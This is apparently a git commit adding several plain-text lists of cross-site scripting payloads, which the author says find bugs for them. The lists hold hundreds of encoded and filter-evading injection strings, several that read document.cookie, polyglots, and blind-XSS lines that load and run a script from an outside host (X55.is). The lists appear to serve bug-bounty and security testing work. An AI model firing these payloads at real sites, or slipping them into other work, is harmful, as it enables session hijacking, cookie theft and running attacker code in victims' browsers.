XSS Payload Files that get me bugs all the time

2024-12-18 10:26:10 +00:00 · 2024-08-06 23:36:07 -07:00 · 2024-08-06 23:36:07 -07:00 · dfa047c84d
commit dfa047c84d
parent 83ea59c835
4 changed files with 3036 additions and 0 deletions
--- a/More_XSS_Payloads.txt
+++ b/More_XSS_Payloads.txt
@ -0,0 +1,70 @@
+<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
+<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
+<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
+<IMG SRC="jav   ascript:alert('XSS');">
+<IMG SRC="jav&#x09;ascript:alert('XSS');">
+<IMG SRC="jav&#x0A;ascript:alert('XSS');">
+<IMG SRC="jav&#x0D;ascript:alert('XSS');">
+perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
+<IMG SRC=" &#14;  javascript:alert('XSS');">
+<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
+<<SCRIPT>alert("XSS");//\<</SCRIPT>
+<IMG SRC="`<javascript:alert>`('XSS')"
+\";alert('XSS');//
+<IMG SRC='vbscript:msgbox("XSS")'>
+Set.constructor`alert\x28document.domain\x29
+exp/*<A STYLE='no\xss:noxss("*//*");
+xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
+<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
+<STYLE type="text/css">BODY{background:url("<javascript:alert>('XSS')")}</STYLE>
+¼script¾alert(¢XSS¢)¼/script¾
+<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
+<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
+<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
+<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
+<HTML><BODY>
+<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
+<?import namespace="t" implementation="#default#time2">
+<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
+</BODY></HTML>
+
+
+<? echo('<SCR)';
+echo('IPT>alert("XSS")</SCRIPT>'); ?>
+
+<script> ... setTimeout(\\"writetitle()\\",$\_GET\[xss\]) ... </script>
+
+/?xss=500); alert(document.cookie);//
+
+<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
+<Video> <source onerror = "javascript: alert (XSS)">
+<Input value = "XSS" type = text>
+<applet code="javascript:confirm(document.cookie);">
+<isindex x="javascript:" onmouseover="alert(XSS)">
+"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
+"><img src="x:x" onerror="alert(XSS)">
+"><iframe src="javascript:alert(XSS)">
+<object data="javascript:alert(XSS)">
+<isindex type=image src=1 onerror=alert(XSS)>
+<img src=x:alert(alt) onerror=eval(src) alt=0>
+<img src="x:gif" onerror="window['al\u0065rt'](0)"></img>
+<iframe/src="data:text/html,<svg onload=alert(1)>">
+<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
+<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
+<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
+<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
+<form><a href="javascript:\u0061lert(1)">X
+</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'>
+<style>//*{x:expression(alert(/xss/))}//<style></style>
+(alert)(1)
+a=alert,a(1)
+[1].find(alert)
+top[“al”+”ert”](1)
+top[/al/.source+/ert/.source](1)
+al\u0065rt(1)
+top[‘al\145rt’](1)
+top[‘al\x65rt’](1)
+top[8680439..toString(30)](1)
+alert?.()
+(alert())
+&#96;`${alert``}`&#96;
--- a/SXSS_Payload_List.txt
+++ b/SXSS_Payload_List.txt
@ -0,0 +1,27 @@
+"><svg/onload=alert(1)>
+"><img src=x onerror="alert(1)">
+"><input type="text" value="Click me" autofocus onfocus="alert(1)">
+"><textarea autofocus onfocus=alert(1)></textarea>
+"><div onmouseover="alert(1)">Hover me</div>
+"><button onclick="alert(1)">Click me</button>
+"><marquee onstart="alert(1)">Test</marquee>
+"><input onblur="alert(1)" value="Click outside this field">
+"><details open ontoggle="alert(1)">
+"><meta http-equiv="refresh" content="0;url=javascript:alert(1);">
+"><object data="javascript:alert(1)"></object>
+"><embed src="javascript:alert(1)">
+"><iframe src="javascript:alert(1)"></iframe>
+"><svg><a xlink:href="javascript:alert(1)">click</a></svg>
+"><link rel="import" href="javascript:alert(1)">
+"><base href="javascript:alert(1)">
+"><plaintext><script>alert(1)</script>
+"><bgsound src="javascript:alert(1)">
+"><frame src="javascript:alert(1)">
+"><xss id=x onmouseenter=alert(1)>
+"><keygen autofocus onfocus=alert(1)>
+"><form><button formaction="javascript:alert(1)">Click me</button></form>
+"><video><source onerror="javascript:alert(1)">
+JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\X55.is?1=18369/.source))}//\76-->
+'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:\\X55.is?1=18369/.source))//>
+<Script /Src=https://X55.is?1=18369></Script>
+"><svg><a xlink:href="https://X55.is?1=18369/.source">click</a></svg>
--- a/List.txt
+++ b/List.txt
@ -0,0 +1,40 @@
+'"><A HRef=\" AutoFocus OnFocus=top/**/?. >
+%27"><A%20HRef=\"%20AutoFocus%20OnFocus=top/**/?. >
+%27/onerror=alert(1)/%27
+/confirm?.(1)/
+<img+only=1+src=x+onerror=confirm(1)>
+">K=%27><Svg /OnLoad=(confirm)(1)>
+%3Cscript%3Evar%20q=`%22`;alert(document.cookie);%3C/script%3E
+<meter%20value="2"%20min="0"%20max="10"%20onmouseover="alert(%27XSS%27)">2%20out%20of%2010</meter>
+<svg/onload=setInterval(%27al\x65rt(1)%27,5000)>
+<img%20src=x%20onerror=alert%281%29>
+<!-- --!><script>alert(1)</script>
+<script><!--\uFEFF--></script><script>alert(%27BOM%20Injection%27)</script>
+<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
+<img//////src=x oNlY=1 oNerror=alert('xxs')//
+</img+src=x%20oNlY=1%20oNerror=alert(document.cookie)>//
+<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`//>
+<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
+<img/src=x onError="`${x}`;alert(`Hello`);">
+<img/src/onerror=alert//&NewLine;(2)>
+%27"><Img%0ASrc%0A=OnXSS%0AOnError%0A=alert(1)>
+JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\X55.is?1=18369/.source))}//\76-->
+'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:\\X55.is?1=18369/.source))//>
+<Script /Src=https://X55.is?1=18369></Script>
+%27)/confirm?.(1);function+myObj(){};function+atob(){confirm?.(1)}//
+--><K:script xmlns:K="http://www.w3.org/1999/xhtml">confirm?.(1)</K:script>
+"'<!--><Img/Src/OnError=(confirm)(1)>"shadowpentesting@gmail.com
+}/confirm?.(1)//%5C
+;1<%252FScript%252F><Img%252FSrc%252FOnError=confirm%253F%252E(1)>
+#Data:,<Img/Src/OnError=(confirm)(1)>
+"' OnError=(confirm)(1) <!--><Img Src='
+'-confirm?.(1);function+myObj(){}'
+confirm?.(1)
+;1%2522--%253E%253CSvg%2520O%256ELoad%253Dconfirm%25281%2529%253E/c
+;1'-confirm`K`-'
+{{$new.constructor('(confirm)(1)')()}}
+%27"><Img%0ASrc%0A=OnXSS%0AOnError%0A=alert(1)>
+'"<%00!--%00><%00Img/Src/On%00Error=(conf%00irm)(1)>
+1'"<<3C>!--<2D>><<3C>Img/Src/On<4F>Error=(conf<6E>irm)(1)>
+<img//////src=x oNlY=1 oNerror=alert(document.cookie)(import(/https:\\X55.is?1=18369/.source))//>
+'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=alert(1)/**/(import(/https:\\X55.is?1=18369/.source))//>
--- a/XSS_Payloads.txt
+++ b/XSS_Payloads.txt